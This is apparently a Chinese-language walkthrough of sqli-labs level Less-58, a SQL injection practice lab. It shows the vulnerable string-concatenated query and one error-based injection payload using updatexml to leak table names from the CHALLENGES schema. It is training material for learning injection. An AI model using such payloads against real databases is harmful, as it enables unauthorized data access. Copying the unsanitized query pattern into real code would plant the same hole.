目录
Less-58
基于错误_GET_单引号_字符型_双注入
这关与之前几关差不多,只是尝试次数只有五次。
源码:
sql语句: $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
执行sql语句后,并没有返回数据库当中的数据,所以我们这里不能使用union联合注入,这里使用报错注入:
1.爆表名:
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES')),1)--+